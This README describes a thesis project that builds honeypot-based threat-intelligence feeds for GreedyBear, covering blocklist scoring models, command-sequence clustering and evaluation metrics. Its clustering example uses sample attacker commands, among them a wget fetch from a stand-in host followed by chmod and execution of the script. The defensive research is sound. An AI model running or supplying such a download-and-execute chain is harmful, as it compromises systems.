Generating Threat Intelligence Live Feeds Based on Honeypot Data

This repository contains the implementation code for my master's thesis on enhancing threat intelligence feeds through advanced generation mechanisms in GreedyBear.

Project Overview

The research focuses on improving the quality of threat intelligence feeds derived from honeypot data by:

Implementing IP blocklist generation mechanisms that prioritise malicious IP addresses
Developing command sequence clustering techniques to identify similar attack patterns across multiple sources
Creating an evaluation method to assess blocklist quality

The project extended GreedyBear with machine learning models and advanced clustering algorithms to transform raw honeypot data into more valuable threat intelligence for the security community.

Repository Structure

clustering/ - Implementation of command sequence clustering algorithms and similarity measures
data_in/ - Scripts for data gathering
data_out/ - Evaluation results
models/ - Implementation of scoring models for blocklist generation

Key Files

evaluate_clustering.py - Clustering quality analysis
evaluate_single_day.py - Single-day analysis of blocklists
evaluate_time_span.py - Analysis of blocklists over multiple days
greedybear_utils.py - Utility functions for interfacing with GreedyBear
train_models.py - Training pipeline for machine learning models with hyperparameter optimization

Implemented Models

The repository implements several scoring models for blocklist generation including:

Logistic Regression Classifier
Random Forest Classifier and Regressor
CatBoost Classifier, Regressor, and Ranker
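
As a rough illustration of how a scoring model's output could become a blocklist, the sketch below keeps the highest-scoring IP addresses. The function name `build_blocklist`, the `size` parameter, and the example scores are hypothetical and not taken from this repository; the actual selection logic in models/ may differ.

```python
from typing import Dict, List


def build_blocklist(scores: Dict[str, float], size: int) -> List[str]:
    """Return the `size` highest-scoring IPs, best first.

    `scores` maps an IP address to a model score (hypothetical input format).
    Ties are broken by IP string so the result is deterministic.
    """
    ranked = sorted(scores.items(), key=lambda item: (-item[1], item[0]))
    return [ip for ip, _ in ranked[:size]]


# Made-up scores for documentation-range IP addresses.
example_scores = {
    "192.0.2.10": 0.91,
    "198.51.100.7": 0.35,
    "203.0.113.5": 0.78,
}
blocklist = build_blocklist(example_scores, size=2)
print(blocklist)
```

The same top-k selection works whether the score comes from a classifier probability, a regressor prediction, or a ranker output, since only the ordering of the scores matters.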

For command sequence clustering, both DBSCAN and Agglomerative Hierarchical Clustering are implemented with Jaccard and Ratcliff/Obershelp similarity measures.
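
The two similarity measures can be sketched with the Python standard library alone. This is a minimal illustration, not the code in clustering/: it assumes a command sequence is a list of command strings, and it uses `difflib.SequenceMatcher`, whose matching algorithm is closely related to Ratcliff/Obershelp, as a stand-in for that measure. The function names and example sequences are hypothetical.

```python
from difflib import SequenceMatcher
from typing import Sequence


def jaccard_similarity(a: Sequence[str], b: Sequence[str]) -> float:
    """Size of the intersection over size of the union of the two command sets."""
    set_a, set_b = set(a), set(b)
    if not set_a and not set_b:
        return 1.0  # convention chosen here: two empty sequences are identical
    return len(set_a & set_b) / len(set_a | set_b)


def ratcliff_obershelp_similarity(a: Sequence[str], b: Sequence[str]) -> float:
    """2 * (matched elements) / (total elements), as computed by difflib."""
    return SequenceMatcher(None, a, b, autojunk=False).ratio()


# Made-up command sequences that differ in one command.
seq_a = ["uname -a", "wget http://example.invalid/x.sh", "chmod +x x.sh", "./x.sh"]
seq_b = ["uname -a", "cat /proc/cpuinfo", "chmod +x x.sh", "./x.sh"]

jaccard = jaccard_similarity(seq_a, seq_b)
gestalt = ratcliff_obershelp_similarity(seq_a, seq_b)
print(jaccard, gestalt)
```

Jaccard ignores command order and repetition, which makes it cheap to compute, while the sequence-matching measure is order-sensitive. A clustering algorithm such as DBSCAN would typically consume `1 - similarity` as a distance.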

Evaluation

The evaluation methodology assesses blocklist quality through:

Prevention-based metrics: Measures how effectively generated blocklists would have prevented future honeypot interactions
Third-party validation: Compares generated blocklists against AbuseIPDB's confidence of abuse scores
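
A prevention-based metric can be sketched as follows. The definitions are assumptions made for illustration: IP-based recall is taken to be the share of future attacker IPs that appear on the blocklist, and interaction-based recall the share of future honeypot interactions that originate from blocklisted IPs. The exact definitions used in the evaluation scripts may differ, and `recall_metrics` is a hypothetical name.

```python
from collections import Counter
from typing import Iterable, Set, Tuple


def recall_metrics(
    blocklist: Set[str], future_interactions: Iterable[str]
) -> Tuple[float, float]:
    """Return (ip_recall, interaction_recall) for one blocklist.

    `future_interactions` holds one source IP per observed interaction
    (assumed input format), so an IP may appear many times.
    """
    counts = Counter(future_interactions)
    if not counts:
        return 0.0, 0.0
    blocked_ips = [ip for ip in counts if ip in blocklist]
    ip_recall = len(blocked_ips) / len(counts)
    interaction_recall = sum(counts[ip] for ip in blocked_ips) / sum(counts.values())
    return ip_recall, interaction_recall


# Made-up data: one blocklisted IP causes three of the four future interactions.
observed = ["192.0.2.10", "192.0.2.10", "192.0.2.10", "198.51.100.7"]
ip_recall, interaction_recall = recall_metrics({"192.0.2.10"}, observed)
print(ip_recall, interaction_recall)
```

In this example the blocklist covers half of the attacking IPs but would have prevented three quarters of the interactions, which shows why the two metrics can rank models differently.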

Results

Key findings of this research include:

Classifier models excel at maximizing IP-based recall
Regressor/ranker models achieve superior interaction-based recall
DBSCAN clustering with Jaccard similarity provides a good balance of accuracy and computational efficiency for identifying attack patterns

The implemented techniques significantly outperform existing GreedyBear feed generation mechanisms and are already in operation.

regulartim/masterthesis
